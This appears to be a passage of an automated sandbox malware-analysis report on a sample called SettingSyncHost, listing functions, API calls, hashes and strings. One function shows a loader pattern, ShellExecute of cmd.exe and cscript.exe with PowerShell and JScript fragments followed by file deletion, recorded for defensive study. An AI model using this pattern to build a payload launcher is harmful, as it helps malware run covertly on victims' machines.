                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                      • Opcode ID: fb16badf9c0009e6e043beeb3f600da8f75b46a8acc87c63273d887633a66caf
                                                                                                                                      • Instruction ID: df10fa9741f825a30acd79e09bc0ca27e6b8959fb21a3cb8b8bfc8b66deac5b3
                                                                                                                                      • Opcode Fuzzy Hash: fb16badf9c0009e6e043beeb3f600da8f75b46a8acc87c63273d887633a66caf
                                                                                                                                      • Instruction Fuzzy Hash: 28E02B765066B195D223273F7D0526B21A49B82335F230336F8209E3E1DF7448414462
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D0420, Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003D0626
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                      • Opcode ID: 889943d2a2bc569ed95f62e770ad323ca5e3a63ba0100de121d7aff8d3d0cd50
                                                                                                                                      • Instruction ID: 47e46784cf8fe0dbc55d1dc47f455db2de4f04231058fef8e9ed36eb28097ee8
                                                                                                                                      • Opcode Fuzzy Hash: 889943d2a2bc569ed95f62e770ad323ca5e3a63ba0100de121d7aff8d3d0cd50
                                                                                                                                      • Instruction Fuzzy Hash: BB51B072A002158BDB19DF2CD99476EB7F6AF88300F09826ED9059F352DB70EE44CB90
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D8ED5, Relevance: 1.6, APIs: 1, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ___std_exception_copy.LIBVCRUNTIME ref: 003CA4FE
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___std_exception_copy
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2659868963-0
                                                                                                                                      • Opcode ID: 074c57ed4ed7bedd818c1681eadd48dd763c14f4c18ad2238bb2e2d69cf1fffd
                                                                                                                                      • Instruction ID: 17c866ff4dc389d67fca9fa765674508a3d05d33907920be02f64d4b1cc68056
                                                                                                                                      • Opcode Fuzzy Hash: 074c57ed4ed7bedd818c1681eadd48dd763c14f4c18ad2238bb2e2d69cf1fffd
                                                                                                                                      • Instruction Fuzzy Hash: 8D012B7640030DA7C716AFA9FC4199A776C9E00364B104627F608DFA90FF70F9548795
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E1F8A, Relevance: 1.5, APIs: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5C62: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,003E5BB2,00000001,00000364,00000006,000000FF,?,003DB376,?,?,?,00000000), ref: 003E5CA3
                                                                                                                                      • _free.LIBCMT ref: 003E1FAA
                                                                                                                                        • Part of subcall function 003E5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7), ref: 003E5CD5
                                                                                                                                        • Part of subcall function 003E5CBF: GetLastError.KERNEL32(003CB0A7,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7,003CB0A7), ref: 003E5CE7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Heap$AllocateErrorFreeLast_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 314386986-0
                                                                                                                                      • Opcode ID: 20ea509a129c0808dd638ac7f489f1022c2b231df9c643f3c7e6b48086eb8a88
                                                                                                                                      • Instruction ID: e406a18333c0fb5696a23794a5d60d91686c030f148b34f0e73a928b77897a37
                                                                                                                                      • Opcode Fuzzy Hash: 20ea509a129c0808dd638ac7f489f1022c2b231df9c643f3c7e6b48086eb8a88
                                                                                                                                      • Instruction Fuzzy Hash: B9010CB6D00619AFCB51DFA9C441A9EBBB8FB48710F104666E914EB280E770AA55CBD0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003CD2F0, Relevance: 1.5, APIs: 1, Instructions: 43networkCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • gethostname.WS2_32(?,00000100), ref: 003CD32F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: gethostname
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 144339138-0
                                                                                                                                      • Opcode ID: 68f9b979b4a3b34dc74061566af56561d572ffc656fe350430a663340c44e224
                                                                                                                                      • Instruction ID: b5d489a28a832887b34feacde5698d0c937b69591e32b2deafc99a0eab1f648b
                                                                                                                                      • Opcode Fuzzy Hash: 68f9b979b4a3b34dc74061566af56561d572ffc656fe350430a663340c44e224
                                                                                                                                      • Instruction Fuzzy Hash: A101F7B5A0021C9BCB11DF24DD41FE9B7B8AB15304F0001ADF585AB281DBB16F89CF95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E5C62, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,003E5BB2,00000001,00000364,00000006,000000FF,?,003DB376,?,?,?,00000000), ref: 003E5CA3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: ff0d38027fa6bef6ba86fcb5b6ff14efb857792d2c55bb42093daab637b20c67
                                                                                                                                      • Instruction ID: c7d12c71bc7f5033893b6da5600227bc9326d78f0f1f980779cb25ce11fd5bdd
                                                                                                                                      • Opcode Fuzzy Hash: ff0d38027fa6bef6ba86fcb5b6ff14efb857792d2c55bb42093daab637b20c67
                                                                                                                                      • Instruction Fuzzy Hash: A1F0B432601BB06A9B235B73DD15A5A3B4C9F41764B364311E806AA1C0CB30E80182A0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003E5CF9, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,003DB376,?,?,?,00000000,?,003CB0A7,?,?,?), ref: 003E5D2B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: 7f98dd4ed9fd0297ef2f958ef075ac1f36d18ef2113437cee72293d7108fc2bf
                                                                                                                                      • Instruction ID: 1e1a32a66b86673d1a5e4bba14d485e99314204cf65eb55c08817cdfdbaf37c2
                                                                                                                                      • Opcode Fuzzy Hash: 7f98dd4ed9fd0297ef2f958ef075ac1f36d18ef2113437cee72293d7108fc2bf
                                                                                                                                      • Instruction Fuzzy Hash: F0E0ED32200EF066DB232767AC0DBAB3A4C9F113B4F160320FC40AA5C0CB20ED0086A5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003DF6C0, Relevance: 1.5, APIs: 1, Instructions: 11COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _free.LIBCMT ref: 003DF6D3
                                                                                                                                        • Part of subcall function 003E5CBF: RtlFreeHeap.NTDLL(00000000,00000000,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7), ref: 003E5CD5
                                                                                                                                        • Part of subcall function 003E5CBF: GetLastError.KERNEL32(003CB0A7,?,003ECBF2,003CB0A7,00000000,003CB0A7,?,?,003ECE95,003CB0A7,00000007,003CB0A7,?,003ED48B,003CB0A7,003CB0A7), ref: 003E5CE7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorFreeHeapLast_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1353095263-0
                                                                                                                                      • Opcode ID: 7f334d11bf63b34a61679b09cd90951c4efdc5bf7b07eca571a903496f50c1da
                                                                                                                                      • Instruction ID: a507da238d7b764d42a969e2db8323bf07510e4e565b7ca856689fff908cb78e
                                                                                                                                      • Opcode Fuzzy Hash: 7f334d11bf63b34a61679b09cd90951c4efdc5bf7b07eca571a903496f50c1da
                                                                                                                                      • Instruction Fuzzy Hash: BEC08C31000208BBCB019B42C906A4E7BA8DB80368F200044F8011B380CAB1EE009680
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 003DAAF8, Relevance: 143.7, APIs: 41, Strings: 41, Instructions: 167libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003DAAFE
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003DAB0C
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003DAB1D
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003DAB2E
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003DAB3F
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003DAB50
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 003DAB61
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 003DAB72
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreW), ref: 003DAB83
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003DAB94
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003DABA5
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003DABB6
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003DABC7
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003DABD8
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003DABE9
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003DABFA
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003DAC0B
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 003DAC1C
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,FreeLibraryWhenCallbackReturns), ref: 003DAC2D
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentProcessorNumber), ref: 003DAC3E
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateSymbolicLinkW), ref: 003DAC4F
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 003DAC60
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetTickCount64), ref: 003DAC71
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetFileInformationByHandleEx), ref: 003DAC82
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SetFileInformationByHandle), ref: 003DAC93
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 003DACA4
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 003DACB5
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeConditionVariable), ref: 003DACC6
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 003DACD7
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 003DACE8
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 003DACF9
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 003DAD0A
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,TryAcquireSRWLockExclusive), ref: 003DAD1B
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 003DAD2C
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableSRW), ref: 003DAD3D
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateThreadpoolWork), ref: 003DAD4E
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SubmitThreadpoolWork), ref: 003DAD5F
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CloseThreadpoolWork), ref: 003DAD70
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 003DAD81
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 003DAD92
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 003DADA3
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                      • String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
                                                                                                                                      • API String ID: 667068680-295688737
                                                                                                                                      • Opcode ID: 766d72e2bb217171e5a08b75918163b86a397bbce55976326c0a9001fce33349
                                                                                                                                      • Instruction ID: 5815903644989b7d8de8c8c79957e57846d26042c4d5a17a2212c0b2e7ff7817
                                                                                                                                      • Opcode Fuzzy Hash: 766d72e2bb217171e5a08b75918163b86a397bbce55976326c0a9001fce33349
                                                                                                                                      • Instruction Fuzzy Hash: AE616D72952354AFC706AFB4AD0DEB73AACAA0970DB00457BF241E6360DBF54051CF5A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003D3AC0, Relevance: 43.9, APIs: 10, Strings: 14, Instructions: 1853sleepfileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003D87F0: __Xtime_get_ticks.LIBCPMT ref: 003D882A
                                                                                                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,0000000A), ref: 003D3CA8
                                                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 003D3D8B
                                                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 003D3F05
                                                                                                                                      • ShellExecuteA.SHELL32(00000000,open,C:\Windows\System32\cscript.exe,?,00000000,00000000), ref: 003D424F
                                                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 003D4330
                                                                                                                                        • Part of subcall function 003CEFD0: Concurrency::cancel_current_task.LIBCPMT ref: 003CF103
                                                                                                                                      • ShellExecuteA.SHELL32(00000000,open,C:\Windows\System32\cmd.exe,?,00000000,00000000), ref: 003D4FA8
                                                                                                                                      • Sleep.KERNEL32(00002710), ref: 003D4FB3
                                                                                                                                      • DeleteFileA.KERNEL32(?), ref: 003D4FC5
                                                                                                                                      • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 003D5142
                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003D5405
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.1526118589.0000000000390000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526141500.0000000000391000.00000020.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526178334.00000000003BB000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526193165.00000000003C5000.00000002.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526202442.00000000003C7000.00000008.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526246972.00000000004EE000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526253653.00000000004F0000.00000004.00020000.sdmp Download File
                                                                                                                                      • Associated: 00000005.00000002.1526259967.00000000004F1000.00000002.00020000.sdmp Download File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_390000_SettingSyncHost.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Ios_base_dtorstd::ios_base::_$ExecuteShell$Concurrency::cancel_current_task$DeleteFileSleepXtime_get_ticks
                                                                                                                                      • String ID: $body = [IO.File]::ReadAllText('$')$.exe$.js$.ps$//e:jsc$/C powershell "$C:\Windows\System32\cmd.exe$C:\Windows\System32\cscript.exe$Incorrect format1$Incorrect format2$failed start exe$open$ript
                                                                                                                                      • API String ID: 1949390-2123262116
                                                                                                                                      • Opcode ID: f42aebf50bdf17f71b4b78be627a1de55b78d000eab3f2622823b3dd51b16c54
                                                                                                                                      • Instruction ID: eb1ad73e7a4f0698df6968cc2367f7e719b4209dd94d715e959acf90c0193b80
                                                                                                                                      • Opcode Fuzzy Hash: f42aebf50bdf17f71b4b78be627a1de55b78d000eab3f2622823b3dd51b16c54
                                                                                                                                      • Instruction Fuzzy Hash: FBF2E372A002588FDB1ACF68DD84BDDBBB5AF49304F24819EE449AB381D7759E80CF51
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 003EDD0D, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 003E5A10: GetLastError.KERNEL32(?,?,?,003DE7AE,?,?,00000000,?,003DE33E,?,?,?), ref: 003E5A15
                                                                                                                                        • Part of subcall function 003E5A10: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,003DE33E,?,?,?), ref: 003E5AB3
                                                                                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,003E25CA,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 003EDDCE
                                                                                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,003E25CA,?,?,?,00000055,?,-00000050,?,?), ref: 003EDDF9
                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 003EDE8D
                                                                                                                                      • _wcschr.LIBVCRUNTIME ref: 003EDE9B
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 003EDF5C
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.1526209189.00000000003C8000.00000040.00020000.sdmp, Offset: 00390000, based on PE: true
